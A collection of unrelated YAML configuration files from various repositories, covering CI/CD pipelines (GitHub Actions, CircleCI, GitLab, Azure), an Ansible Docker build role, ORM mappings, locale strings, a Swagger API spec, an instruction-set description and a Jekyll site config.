uses: google-github-actions/setup-gcloud@v0.2.0
with:
          # Version of the gcloud SDK to install. If unspecified or set to "latest",
          # the latest available gcloud SDK version for the target platform will be
          # installed. Example: "290.0.1".
          version: # optional, default is latest
          # Service account email address to use for authentication. This is required
          # for legacy .p12 keys but can be omitted for .json keys. This is usually of
          # the format <name>@<project-id>.iam.gserviceaccount.com.
          service_account_email: # optional
          # Service account key to use for authentication. This should be the JSON
          # formatted private key which can be exported from the Cloud Console. The
          # value can be raw or base64-encoded.
          service_account_key: # optional
          # ID of the Google Cloud project. If provided, this will configure gcloud to
          # use this project ID by default for commands. Individual commands can still
          # override the project using the --project flag which takes precedence.
          project_id: # optional
          # Export the provided credentials as Google Default Application Credentials.
          # This will make the credentials available to later steps via the
          # GOOGLE_APPLICATION_CREDENTIALS environment variable. Future steps that
          # consume Default Application Credentials will automatically detect and use
          # these credentials.
          export_default_credentials: # optional
|
.github/workflows/gem-push.yml
|
version: 2
jobs:
build:
environment:
CC_TEST_REPORTER_ID: ea9530feaaafc4b5d0c9f84eccb3609a2ebae84b52dad6f0c194c0b5f8b60fcf
docker:
- image: circleci/php:7.1-browsers
environment:
IMG_TAG: $(echo $CIRCLE_SHA1 | cut -c -7)
DB_CONNECTION: pgsql
DB_HOST: 127.0.0.1
CACHE_DRIVER: file
JWT_SECRET: <KEY>
APP_KEY: <KEY>
APP_ENV: testing
DB_DATABASE: circle_test
DB_USERNAME: ubuntu
DB_PASSWORD: ""
- image: circleci/postgres:9.6
environment:
POSTGRES_USER: ubuntu
POSTGRES_DB: circle_test
POSTGRES_PASSWORD: ""
working_directory: ~/repo
steps:
- run:
name: Install PHP extensions
command: |
sudo apt-get install -y libpq-dev
# sudo apt-get install -y libpng-dev libjpeg-dev
# sudo docker-php-ext-configure pgsql -with-pgsql=/usr/local/pgsql
# docker-php-ext-configure gd --with-gd --with-jpeg-dir --with-png-dir --enable-gd-native-ttf
sudo docker-php-ext-install pdo pdo_pgsql pgsql
# sudo docker-php-ext-install gd
sudo apt-get install -y libfreetype6-dev libjpeg62-turbo-dev libpng-dev && sudo docker-php-ext-configure gd --with-freetype-dir=/usr/include/ --with-jpeg-dir=/usr/include/ && sudo -E docker-php-ext-install -j$(nproc) gd
- run:
name: Install Composer
command: curl -sS https://getcomposer.org/installer | sudo php -- --install-dir=/usr/local/bin --filename=composer
- checkout
# Download and cache dependencies
- restore_cache:
keys:
- v1-dependencies-{{ checksum "composer.json" }}
# fallback to using the latest cache if no exact match is found
- v1-dependencies-
- run:
name: Setup Code Climate test-reporter
command: |
# download test reporter as a static binary
curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
chmod +x ./cc-test-reporter
- run: composer install -n --prefer-dist
- save_cache:
paths:
- ./vendor
key: v1-dependencies-{{ checksum "composer.json" }}
- run:
name: Migrate Laravel Database
command: php artisan migrate:refresh --env=testing --force
- run:
name: Run tests
command: |
./cc-test-reporter before-build
./vendor/bin/phpunit --coverage-clover clover.xml
./cc-test-reporter after-build --coverage-input-type clover --exit-code $?
|
.circleci/config.yml
|
Urbem\CoreBundle\Entity\SwCgaPessoaFisica:
type: entity
table: sw_cga_pessoa_fisica
id:
numcgm:
type: integer
generator:
strategy: NONE
timestamp:
type: datetimemicrosecondpk
generator:
strategy: NONE
fields:
codCategoriaCnh:
type: integer
nullable: false
column: cod_categoria_cnh
dtEmissaoRg:
type: date
nullable: true
column: dt_emissao_rg
orgaoEmissor:
type: string
nullable: false
length: 20
column: orgao_emissor
cpf:
type: string
nullable: true
length: 11
numCnh:
type: string
nullable: false
length: 15
column: num_cnh
dtValidadeCnh:
type: date
nullable: true
column: dt_validade_cnh
codNacionalidade:
type: integer
nullable: false
column: cod_nacionalidade
codEscolaridade:
type: integer
nullable: true
column: cod_escolaridade
rg:
type: string
nullable: false
length: 15
dtNascimento:
type: date
nullable: true
column: dt_nascimento
sexo:
type: string
nullable: true
length: 1
manyToOne:
fkSwCategoriaHabilitacao:
targetEntity: Urbem\CoreBundle\Entity\SwCategoriaHabilitacao
inversedBy: fkSwCgaPessoaFisicas
joinColumns:
cod_categoria_cnh:
referencedColumnName: cod_categoria
fkSwPais:
targetEntity: Urbem\CoreBundle\Entity\SwPais
inversedBy: fkSwCgaPessoaFisicas
joinColumns:
cod_nacionalidade:
referencedColumnName: cod_pais
fkSwEscolaridade:
targetEntity: Urbem\CoreBundle\Entity\SwEscolaridade
inversedBy: fkSwCgaPessoaFisicas
joinColumns:
cod_escolaridade:
referencedColumnName: cod_escolaridade
oneToOne:
fkSwCga:
targetEntity: Urbem\CoreBundle\Entity\SwCga
inversedBy: fkSwCgaPessoaFisica
joinColumns:
numcgm:
referencedColumnName: numcgm
timestamp:
referencedColumnName: timestamp
|
src/Urbem/CoreBundle/Resources/config/doctrine/SwCgaPessoaFisica.orm.yml
|
---
- name: Create {{ context_path }} context
file: path="{{ context_path }}" state=directory
- name: Update and copy Dockerfile for adding PT
template:
src: "Dockerfile_mount_pt.j2"
dest: "{{ context_path }}/Dockerfile"
tags:
- template
- copy
- files
- docker
- name: Create PT uncompressing folder
file: path="{{ docker_context_uncompressed_installation }}" state=directory
- name: Uncompress installation files
shell: "tar zxvf {{ xvfb_ptadd_context }}/{{ compressed_installation_file.name }} -C {{ docker_context_uncompressed_installation }}"
# unarchive:
# src: "{{ compressed_installation_file.name }}"
# dest: "{{ compressed_installation_file.decompressed }}"
# creates: yes
# copy: no
tags:
- uncompress
- installation
- files
- packetTracer
- name: Remove unused PT main folder (it will be mounted from a data-only container)
shell: "{{ item }}"
become: True
with_items:
- "rm -rf {{ docker_context_uncompressed_installation }}/{{ compressed_installation_file.folders[0].backup }}"
- name: Build docker container automatically
shell: "docker build --rm -t {{ image_name }} {{ context_path }}"
ignore_errors: True
register: container_build
tags:
- build
- container
- docker
- name: Add 'packettracer' tag
shell: "docker tag -f {{ image_name }} {{ docker_image }}"
when: container_build.rc != 1
ignore_errors: True
register: container_build
tags:
- container
- docker
- tag
- name: Build docker container manually
debug: msg="{{ item }}"
when: container_build.rc == 1
with_items:
- "docker build --rm -t {{ image_name }} {{ context_path }}"
- "docker tag {{ image_name }} {{ docker_image }}"
- name: Remove temporary folder
file: path="{{ compressed_installation_file.decompressed }}" state=absent
- name: Reminder to run image built
debug: msg="docker run --volumes-from {{ data_container }} -p 5901:{{ docker_vnc_port }} -p 39000:{{ docker_pt_port }} -dti {{ docker_image }}"
when: not include_pt
|
roles/packetTracer_docker_xvfb/tasks/build_final_image.yml
|
name: CI - cli
on:
workflow_dispatch:
pull_request:
branches:
- '*'
push:
branches:
- latest
jobs:
lint:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Use Node.js 16.x
uses: actions/setup-node@v3
with:
node-version: 16.x
cache: npm
- run: node ./bin/npm-cli.js run resetdeps
- run: node ./bin/npm-cli.js run lint
check_docs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Use Node.js 16.x
uses: actions/setup-node@v3
with:
node-version: 16.x
cache: npm
- run: make freshdocs
- run: node scripts/git-dirty.js
licenses:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Use Node.js 16.x
uses: actions/setup-node@v3
with:
node-version: 16.x
cache: npm
- run: node ./bin/npm-cli.js run resetdeps
- run: node ./bin/npm-cli.js run licenses
smoke-tests:
strategy:
fail-fast: false
matrix:
node-version:
- 12.x
- 14.x
- 16.x
platform:
- os: ubuntu-latest
shell: bash
- os: macos-latest
shell: bash
- os: windows-latest
shell: cmd
runs-on: ${{ matrix.platform.os }}
defaults:
run:
shell: ${{ matrix.platform.shell }}
steps:
- uses: actions/checkout@v3
- name: Use Node.js ${{ matrix.node-version }}
uses: actions/setup-node@v3
with:
node-version: ${{ matrix.node-version }}
cache: npm
- run: node ./bin/npm-cli.js run resetdeps
- run: node ./bin/npm-cli.js run smoke-tests --ignore-scripts
- name: git status
if: matrix.platform.os != 'windows-latest'
run: node scripts/git-dirty.js
test:
strategy:
fail-fast: false
matrix:
node-version:
- 12.13.0
- 12.x
- 14.15.0
- 14.x
- 16.0.0
- 16.x
platform:
- os: ubuntu-latest
shell: bash
- os: macos-latest
shell: bash
- os: windows-latest
shell: cmd
runs-on: ${{ matrix.platform.os }}
defaults:
run:
shell: ${{ matrix.platform.shell }}
steps:
- uses: actions/checkout@v3
- name: Use Node.js ${{ matrix.node-version }}
uses: actions/setup-node@v3
with:
node-version: ${{ matrix.node-version }}
cache: npm
- run: node ./bin/npm-cli.js run resetdeps
- run: node ./bin/npm-cli.js run test --ignore-scripts
- name: git status
if: matrix.platform.os != 'windows-latest'
run: node scripts/git-dirty.js
|
.github/workflows/ci.yml
|
image: atomfrede/gitlab-ci-jhipster-stack
<%_ if (buildTool == 'gradle') { _%>
cache:
key: "$CI_BUILD_REF_NAME"
paths:
- node_modules
- .gradle/wrapper
- .gradle/caches
<%_ } _%>
<%_ if (buildTool == 'maven') { _%>
cache:
key: "$CI_BUILD_REF_NAME"
paths:
- node_modules
- .maven
<%_ } _%>
stages:
- build
- test
- package
- release
- deploy
before_script:
- export GRADLE_USER_HOME=`pwd`/.gradle
- export MAVEN_USER_HOME=`pwd`/.maven
<%_ if (!skipClient) { _%>
- npm install
<%_ } _%>
<%_ if (buildTool == 'gradle') { _%>
gradle-build:
stage: build
script:
- ./gradlew compileJava -x check --no-daemon
<%_ if (!skipClient) { _%>
gulp-build:
stage: build
script:
- gulp build
<%_ } _%>
gradle-test:
stage: test
script:
- ./gradlew check --no-daemon
artifacts:
paths:
- build/reports/tests/*
<%_ if (testFrameworks.indexOf('gatling') !== -1) { _%>
gatling-test:
stage: test
allow_failure: true
script:
- ./gradlew gatlingRun -x cleanResources --no-daemon
before_script:
<%_ if (!skipClient) { _%>
- npm install
<%_ } _%>
- ./gradlew bootRun &
artifacts:
paths:
- build/reports/gatling/*
<%_ } _%>
gradle-repackage:
stage: package
script:
- ./gradlew bootRepackage -x check --no-daemon
artifacts:
paths:
- build/libs/*.war
<%_ } _%>
<%_ if (buildTool == 'maven') { _%>
maven-build:
stage: build
script: ./mvnw compile -Dmaven.repo.local=$MAVEN_USER_HOME
<%_ if (!skipClient) { _%>
gulp-build:
stage: build
script:
- gulp build
<%_ } _%>
maven-test:
stage: test
script:
- ./mvnw test -Dmaven.repo.local=$MAVEN_USER_HOME
artifacts:
paths:
- target/surefire-reports/*
<%_ if (testFrameworks.indexOf('gatling') !== -1) { _%>
gatling-test:
stage: test
allow_failure: true
script:
- ./mvnw gatling:execute -Dmaven.repo.local=$MAVEN_USER_HOME
before_script:
<%_ if (!skipClient) { _%>
- npm install
<%_ } _%>
- ./mvnw &
artifacts:
paths:
- target/gatling/*
<%_ } _%>
maven-package:
stage: package
script:
- ./mvnw package -Dmaven.repo.local=$MAVEN_USER_HOME
artifacts:
paths:
- target/*.war
<%_ } _%>
|
generators/app/templates/.gitlab-ci.yml
|
fr:
activemodel:
models:
education: Enseignement
activerecord:
models:
education/program:
one: Formation
other: Formations
education/program/role:
one: Rôle
other: Rôles
education/program/role/person:
one: Personne
other: Personnes
education/program/teacher:
one: Enseignant·e
other: Enseignants·es
education/school:
one: École
other: Écoles
education/school/administrator:
one: Équipe administrative
other: Équipe administrative
attributes:
education/program:
accessibility: Accessibilité
capacity: Capacité
contacts: Contacts
continuing: Formation continue
description: Description
duration: Durée
ects: Crédits ECTS
evaluation: Modalités d’évaluation
featured_image: Image à la une
featured_image_alt: Texte alternatif
level: Niveau
name: Nom
objectives: Objectifs
opportunities: Débouchés
other: Autre
pedagogy: Méthodes mobilisées
prerequisites: Prérequis
pricing: Tarifs
published: Publiée ?
registration: Modalités et délais d’accès
roles: Rôles
schools: Écoles proposant cette formation
teachers: Enseignants·es
team: Équipe
content: Contenus de la formation
results: Indicateurs de résultats
education/program/role:
people: Personnes
title: Titre
education/program/role/person:
person: Personne
education/program/teacher:
description: Description
person: Personne
education/school:
address: Adresse
administrators: Équipe administrative
city: Ville
country: Pays
name: Nom
phone: Téléphone
programs: Formations dispensées
websites: Sites webs associés
zipcode: Code postal
education/school/administrator:
description: Description
person: Personne
education:
manage_teachers: Gérer les Enseignants·es
number_of_programs: Nombre de formations
program:
educational_informations: Informations pédagogiques
main_informations: Informations essentielles
useful_informations: Informations pratiques
roles:
one: Rôle
other: Rôles
teachers:
one: Enseignant·e
other: Enseignants·es
enums:
education:
program:
level:
bachelor: Licence / bachelor
doctor: Doctorat
dut: DUT
first_year: Bac + 1
master: Master
second_year: Bac + 2
simple_form:
hints:
education_program:
capacity: Nombre de places disponibles par promotion
ects: European Credits Transfer System
prerequisites: Préalables nécessaires ou indispensables pour bénéficier d'une prestation déterminée. L'absence de prérequis doit être mentionnée.
objectives: "Énoncé des aptitudes et compétences, visées et évaluables, qui seront acquises au cours de la prestation. Aptitude : capacité d'appliquer un savoir et d'utiliser un savoir-faire pour réaliser des tâches et résoudre des problèmes. Compétences : capacité avérée de mettre en œuvre des savoirs, des savoir-faire et des dispositions personnelles, sociales ou méthodologiques dans des situations de travail ou d’études/formations, pour le développement professionnel ou personnel."
duration: La durée peut être exprimée en heure ou en jour. Elle peut également être forfaitisée ou estimée.
registration: "Délai d’accès : durée estimée entre la demande du bénéficiaire et le début de la prestation."
pricing: Prix de la prestation ou conditions tarifaires.
pedagogy: Modalités pédagogiques et/ou moyens et/ou outils utilisés pour mener à bien la prestation dispensée.
evaluation: Moyens mobilisés pour mesurer à l'aide de critères objectifs les acquis du bénéficiaire en cours et/ou à la fin de la prestation.
accessibility: Conditions d'accueil et d’accès des publics en situation de handicap (locaux, adaptation des moyens de la prestation).
description: Texte simple, sans HTML, pour le SEO
|
config/locales/education/fr.yml
|
homepage: https://github.com/hercules-ci/hercules-ci-agent#readme
changelog-type: markdown
hash: 21cede716e4c101357fa5ad0873c1552e9665687a7739a03aa37d5ed6664c95f
test-bench-deps: {}
maintainer: <EMAIL>
synopsis: Hercules CI API definition with Servant
changelog: |
# Changelog
All notable changes to this project will be documented in this file.
The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/)
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
## [0.7.1.0] - 2021-09-06
### Added
- Notification settings
- Email info
- State locks: opt-in locks to be used in conjunction with state files. Use of locks is not enforced.
### Changed
- `DerivationOutput.outputPath` is now nullable when retrieving build info
## [0.7.0.0] - 2021-06-22
### Added
- Account: manageInstallationURL, installationIsSelection
- AccountInstallationStatus
- signOut
- Agent labels
- By name variations of account and state endpoints
## [0.6.0.1] - 2020-04-21
### Fixed
- A warning
## [0.6.0.0] - 2020-03-07
### Added
- Build logs
- Evaluation log
- Attribute types
- Effects
- State files
- CLI authorization flow
- Endpoint for resolving git urls to projects
### Changed
- Adaptations to support servant streaming
## [0.5.0.0] - 2020-01-30
### Changed
- `hercules-ci-api-core` and `hercules-ci-api-agent` packages have been extracted.
### Added
- Account settings
- Project enable/disable
- Some authorization-related fields
- Billing
- Derivation info and events
- Job derivation statistics and improved status reporting
- Derivation and Job restarts
- Job cancellation
## [0.4.0.0] - 2019-08-30
### Fixed
- Swagger schema was wrong for a Result
- Swagger schema is now written using UTF-8 encoding
### Changed
- /jobs endpoint changed to be hierarchical
### Added
- Submit number of concurrent tasks to the backend for better scheduling of evaluations (to avoid IFD deadlocks)
- New endpoint to return evaluation build dependencies for IFD
## [0.3.0.0] - 2019-07-05
### Added
- The CachixCache JSON format for configuring binary caches.
- Endpoints for lifecycle management: hello, hearbeat, goodbye.
- requiredFeatures support
## 0.1.0.0
Initial release
[0.7.1.0]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.7.0.0...hercules-ci-api-0.7.1.0
[0.7.0.0]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.6.0.1...hercules-ci-api-0.7.0.0
[0.6.0.1]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.6.0.0...hercules-ci-api-0.6.0.1
[0.6.0.0]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.5.0.0...hercules-ci-api-0.6.0.0
[0.5.0.0]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.4.0.0...hercules-ci-api-0.5.0.0
[0.4.0.0]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.3.0.0...hercules-ci-api-0.4.0.0
[0.3.0.0]: https://github.com/hercules-ci/hercules-ci-agent/compare/hercules-ci-agent-0.1.0.0...hercules-ci-api-0.3.0.0
[Unreleased]: https://github.com/hercules-ci/hercules-ci-agent/compare/stable...master
basic-deps:
cookie: -any
exceptions: -any
bytestring: -any
lens-aeson: -any
base: '>=4.7 && <5'
time: -any
text: -any
uuid: -any
http-api-data: -any
servant-auth-swagger: -any
servant-swagger: -any
servant-swagger-ui-core: -any
servant: '>=0.14.1'
memory: -any
containers: -any
string-conv: -any
lens: -any
servant-auth: -any
hercules-ci-api-core: -any
network-uri: -any
hashable: -any
swagger2: -any
aeson: -any
hercules-ci-api: -any
http-media: -any
profunctors: -any
all-versions:
- 0.6.0.0
- 0.6.0.1
- 0.7.0.0
- 0.7.1.0
author: Hercules <NAME>
latest: 0.7.1.0
description-type: haddock
description: ''
license-name: Apache-2.0
|
packages/he/hercules-ci-api.yaml
|
- name: xsetbv
long_name: "Set Extended Control Register"
purpose: |
"
Writes the contents of registers EDX:EAX into the 64-bit extended control
register (XCR) specified in the ECX register. (On processors that support
the Intel 64 architecture, the high-order 32 bits of RCX are ignored.)
The contents of the EDX register are copied to high-order 32 bits of the
selected XCR and the contents of the EAX register are copied to low-order
32 bits of the XCR. (On processors that support the Intel 64
architecture, the high-order 32 bits of each of RAX and RDX are
ignored.) Undefined or reserved bits in an XCR should be set to values
previously read. This instruction must be executed at privilege level 0
or in real-address mode; otherwise, a general protection exception #GP(0)
is generated. Specifying a reserved or unimplemented XCR in ECX will also
cause a general protection exception. The processor will also generate a
general protection exception if software attempts to write to reserved
bits in an XCR. Currently, only XCR0 is supported. Thus, all other
values of ECX are reserved and will cause a #GP(0). Note that bit 0 of
XCR0 (corresponding to x87 state) must be set to 1; the instruction will
cause a #GP(0) if an attempt is made to clear this bit. In addition, the
instruction causes a #GP(0) if an attempt is made to set XCR0[2] (AVX
state) while clearing XCR0[1] (SSE state); it is necessary to set both
bits to use AVX instructions; Section 13.3, “Enabling the XSAVE Feature
Set and XSAVE-Enabled Features,” of Intel® 64 and IA-32 Architectures
Software Developer’s Manual, Volume 1.
"
execution_contexts:
- execution_state: 64bit
logical_inputs:
- name: xcr
type: uint32
- name: value
type: uint64
register_operands:
- name: eax
input: true
- name: ecx
input: true
- name: edx
input: true
|
data/intel/instruction/architectural/xsetbv.yml
|
trigger:
- master
pool:
vmImage: 'windows-latest'
variables:
solution: '**/*.sln'
buildPlatform: 'Any CPU'
buildConfiguration: 'Release'
steps:
# ensure we're using an up-to-date SDK
- task: UseDotNet@2
inputs:
packageType: 'sdk'
version: '3.1.x'
- task: DotNetCoreCLI@2
displayName: Restore nuget packages
inputs:
command: restore
projects: '**/*.csproj'
workingDirectory: $(Build.SourcesDirectory)
# No need to build if we are just going to publish
# - task: DotNetCoreCLI@2
# displayName: 'Build Sloth.Api'
# inputs:
# command: 'build'
# projects: './sloth.api/sloth.api.csproj'
# arguments: '--configuration $(buildConfiguration)'
# - task: DotNetCoreCLI@2
# displayName: 'Build Sloth.Web'
# inputs:
# command: 'build'
# projects: './sloth.web/sloth.web.csproj'
# arguments: '--configuration $(buildConfiguration)'
# - task: DotNetCoreCLI@2
# displayName: 'Build Sloth.Jobs.CyberSource.BankReconcile'
# inputs:
# command: 'build'
# projects: './sloth.jobs.cybersource.bankreconcile/sloth.jobs.cybersource.bankreconcile.csproj'
# arguments: '--configuration $(buildConfiguration)'
# - task: DotNetCoreCLI@2
# displayName: 'Build Sloth.Jobs.Kfs.ScrubberUpload'
# inputs:
# command: 'build'
# projects: './sloth.jobs.kfs.scrubberupload/sloth.jobs.kfs.scrubberupload.csproj'
# arguments: '--configuration $(buildConfiguration)'
- task: DotNetCoreCLI@2
displayName: 'Assemble Sloth.Api'
inputs:
command: 'publish'
publishWebProjects: false
zipAfterPublish: false
modifyOutputPath: false
projects: './sloth.api/sloth.api.csproj'
arguments: '--configuration $(buildConfiguration) --output $(build.artifactstagingdirectory)/sloth.api'
- task: DotNetCoreCLI@2
displayName: 'Assemble Sloth.Web'
inputs:
command: 'publish'
publishWebProjects: false
zipAfterPublish: false
modifyOutputPath: false
projects: './sloth.web/sloth.web.csproj'
arguments: '--configuration $(buildConfiguration) --output $(build.artifactstagingdirectory)/sloth.web'
- task: DotNetCoreCLI@2
displayName: 'Assemble Sloth.Jobs.CyberSource.BankReconcile w/ Web'
inputs:
command: 'publish'
publishWebProjects: false
zipAfterPublish: false
projects: './sloth.jobs.cybersource.bankreconcile/sloth.jobs.cybersource.bankreconcile.csproj'
arguments: '--configuration $(buildConfiguration) --output $(Build.ArtifactStagingDirectory)/sloth.web/app_data/jobs/triggered'
- task: DotNetCoreCLI@2
displayName: 'Assemble Sloth.Jobs.Kfs.ScrubberUpload w/ Web'
inputs:
command: 'publish'
publishWebProjects: false
zipAfterPublish: false
projects: './sloth.jobs.kfs.scrubberupload/sloth.jobs.kfs.scrubberupload.csproj'
arguments: '--configuration $(buildConfiguration) --output $(Build.ArtifactStagingDirectory)/sloth.web/app_data/jobs/triggered'
- task: DotNetCoreCLI@2
displayName: 'Assemble Sloth.Jobs.WebHooks.Resend w/ Web'
inputs:
command: 'publish'
publishWebProjects: false
zipAfterPublish: false
projects: './sloth.jobs.webhooks.resend/sloth.jobs.webhooks.resend.csproj'
arguments: '--configuration $(buildConfiguration) --output $(Build.ArtifactStagingDirectory)/sloth.web/app_data/jobs/triggered'
- task: PublishBuildArtifacts@1
displayName: 'Publish Artifacts'
inputs:
PathtoPublish: '$(Build.ArtifactStagingDirectory)'
ArtifactName: 'build'
publishLocation: 'Container'
- task: DotNetCoreCLI@2
displayName: 'Test'
inputs:
command: 'test'
projects: './sloth.test/sloth.test.csproj'
|
azure-pipelines.yml
|
swagger: "2.0"
info:
description: "This is a REST API for a Book Directory, where is possible to add, get, update and delete books"
version: "1.0.0"
title: "Book Directory"
license:
name: "MIT License"
url: "https://opensource.org/licenses/MIT"
host: "localhost:8080"
basePath: "/"
tags:
- name: "Books"
description: "Every endpoint related to books"
schemes:
- "http"
paths:
/books:
post:
tags:
- "Books"
summary: "Adds a new book to the directory"
description: "Adds a new book to the directory"
operationId: "insertBook"
consumes:
- "application/json"
produces:
- "application/json"
parameters:
- in: "body"
name: "body"
description: "Book object that needs to be added to the directory"
required: true
schema:
$ref: "#/definitions/Book"
responses:
"200":
description: "Success"
get:
tags:
- "Books"
summary: "Get all the books from the directory"
description: "Get all the books from the directory"
operationId: "getBooks"
produces:
- "application/json"
responses:
"200":
description: "Success"
/books/{id}:
get:
tags:
- "Books"
      summary: "Get a single book from the directory"
      description: "Get a single book from the directory by its ISBN"
operationId: "getBook"
parameters:
- in: "path"
name: "id"
type: integer
description: "ISBN of the requested book"
required: true
responses:
"200":
description: "Success"
put:
tags:
- "Books"
summary: "Update a book from the directory"
description: "Update a book from the directory"
operationId: "updateBook"
parameters:
- in: "path"
name: "id"
type: integer
description: "ISBN of the requested book"
required: true
- in: "body"
name: "body"
        description: "Updated book object that replaces the existing entry in the directory"
required: true
schema:
$ref: "#/definitions/Book"
responses:
"200":
description: "Success"
delete:
tags:
- "Books"
summary: "Delete a book from the directory"
description: "Delete a book from the directory"
operationId: "deleteBook"
parameters:
- in: "path"
name: "id"
type: integer
description: "ISBN of the requested book"
required: true
responses:
"200":
description: "Success"
definitions:
Book:
type: "object"
properties:
isbn:
type: "integer"
description: "ISBN of the book"
name:
type: "string"
description: "Name of the book"
numberOfPages:
type: "integer"
description: "Number of pages of the book"
|
src/data/swagger.yaml
|
title: pst.libre.lu
logo: /assets/media/logo.png
tagline: pll
email: <EMAIL>
description: >
The most incomprehensible thing about the world is that it is comprehensible.
<NAME>
baseurl: ""
url: "https://pst.libre.lu"
permalink: pretty
favicon: /assets/media/favicon.png
hide_share_buttons: true
theme: bulma-clean-theme
# Disqus Comments
disqus:
# Leave shortname blank to disable comments site-wide.
# Disable comments for any post by adding `comments: false` to that post's YAML Front Matter.
# shortname: my_disqus_shortname
shortname:
plugins:
- jekyll-sitemap
- jekyll-paginate-v2
- kramdown-parser-gfm
- jekyll-target-blank
exclude:
- Gemfile
- clean-theme.gemspec
- Gemfile.lock
- node_modules
- vendor/bundle/
- vendor/cache/
- vendor/gems/
- vendor/ruby/
livereload: true
sass:
style: compressed
source_dir: _sass
#gh_sponsor: psteichen
#google_analytics: UA-code-here
defaults:
-
scope:
path: ""
type: "pages"
values:
show_sidebar: true
-
scope:
path: ""
type: "posts"
values:
author: "<NAME>"
layout: post
image: /assets/media/io.png
show_sidebar: true
markdown: kramdown
highlighter: rouge
footer_menu: footer_menu
collections:
lectures:
output: true
layout: lecture
sort_by: year
show_sidebar: false
talks:
output: true
layout: talk
sort_by: year
show_sidebar: false
tools:
output: true
layout: tool
image: https://via.placeholder.com/800x600
show_sidebar: false
############################################################
# Site configuration for the Jekyll 3 Pagination Gem
# The values here represent the defaults if nothing is set
pagination:
  # Site-wide kill switch; when disabled here, pagination doesn't run at all
enabled: true
# Set to 'true' to enable pagination debugging. This can be enabled in the site config or only for individual pagination pages
debug: false
# The default document collection to paginate if nothing is specified ('posts' is default)
collection:
- talks
- lectures
# How many objects per paginated page, used to be `paginate` (default: 0, means all)
per_page: 4
# The permalink structure for the paginated pages (this can be any level deep)
permalink: '/page/:num/' # Pages are index.html inside this folder (default)
#permalink: '/page/:num.html' # Pages are simple html files
#permalink: '/page/:num' # Pages are html files, linked jekyll extensionless permalink style.
# Optional the title format for the paginated pages (supports :title for original page title, :num for pagination page number, :max for total number of pages)
title: ':title - page :num'
  # Limit how many paginated pages to create (default: 0, means all)
limit: 0
# Optional, defines the field that the posts should be sorted on (omit to default to 'date')
sort_field: 'date'
  # Optional, sorts the posts in reverse order (omit to default descending or sort_reverse: true)
sort_reverse: true
# Optional, the default category to use, omit or just leave this as 'posts' to get a backwards-compatible behavior (all posts)
category: 'posts'
# Optional, the default tag to use, omit to disable
tag: ''
# Optional, the default locale to use, omit to disable (depends on a field 'locale' to be specified in the posts,
# in reality this can be any value, suggested are the Microsoft locale-codes (e.g. en_US, en_GB) or simply the ISO-639 language code )
locale: ''
  # Optional; omit or set both before and after to zero to disable.
# Controls how the pagination trail for the paginated pages look like.
trail:
before: 2
after: 2
# Optional, the default file extension for generated pages (e.g html, json, xml).
# Internally this is set to html by default
extension: html
# Optional, the default name of the index file for generated pages (e.g. 'index.html')
# Without file extension
indexpage: 'index'
|
_config.yml
|
name: Dev Deploy
# Controls when the workflow will run
on:
# Triggers the workflow on push or pull request events but only for the main branch
push:
branches: [ develop ]
pull_request:
branches: [ develop ]
# Allows you to run this workflow manually from the Actions tab
workflow_dispatch:
# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
# This workflow contains a single job called "build"
build:
# The type of runner that the job will run on
runs-on: ubuntu-latest
env:
AWS_DEFAULT_REGION: us-east-1
TF_VAR_master_password: ${{ secrets.TF_VAR_master_password }}
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
permissions:
id-token: write
contents: write
# Steps represent a sequence of tasks that will be executed as part of the job
steps:
# Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
- name: checkout
uses: actions/checkout@v2
with:
fetch-depth: 0
          persist-credentials: true # keep the checkout token in git config so later steps can push
- run: sleep 5 # there's still a race condition for now
- name: Configure AWS
run: |
export AWS_ROLE_ARN=arn:aws:iam::733041935482:role/GithubAWSTerraformRole
export AWS_WEB_IDENTITY_TOKEN_FILE=/tmp/awscreds
export AWS_DEFAULT_REGION=us-east-1
echo AWS_WEB_IDENTITY_TOKEN_FILE=$AWS_WEB_IDENTITY_TOKEN_FILE >> $GITHUB_ENV
echo GITHUB_TOKEN=$GITHUB_TOKEN >> $GITHUB_ENV
echo AWS_ROLE_ARN=$AWS_ROLE_ARN >> $GITHUB_ENV
echo AWS_DEFAULT_REGION=$AWS_DEFAULT_REGION >> $GITHUB_ENV
curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL" | jq -r '.value' > $AWS_WEB_IDENTITY_TOKEN_FILE
aws sts assume-role-with-web-identity --role-arn $AWS_ROLE_ARN --role-session-name mh9test --web-identity-token file://$AWS_WEB_IDENTITY_TOKEN_FILE --duration-seconds 3000 > /tmp/irp-cred.txt
        echo AWS_ACCESS_KEY_ID="$(cat /tmp/irp-cred.txt | jq -r ".Credentials.AccessKeyId")" >> $GITHUB_ENV
        echo AWS_SECRET_ACCESS_KEY="$(cat /tmp/irp-cred.txt | jq -r ".Credentials.SecretAccessKey")" >> $GITHUB_ENV
        echo AWS_SESSION_TOKEN="$(cat /tmp/irp-cred.txt | jq -r ".Credentials.SessionToken")" >> $GITHUB_ENV
# Runs a set of commands using the runners shell
- name: Setup infracost creds
run: |
        mkdir -p ~/.config/infracost
echo "${{ secrets.INFRACOST_CREDS }}" > ~/.config/infracost/credentials.yml
chmod 600 ~/.config/infracost/credentials.yml
- name: Setup infra modules deploy key
run: |
        mkdir -p ~/.ssh
        echo "${{ secrets.ssh_key_shared_modules }}" > ~/.ssh/id_rsa
        chmod 600 ~/.ssh/id_rsa
        ssh-keyscan -t rsa github.com >> ~/.ssh/known_hosts
- name: Install Terraform
uses: little-core-labs/install-terraform@v2.0.0
with:
version: 1.0.5
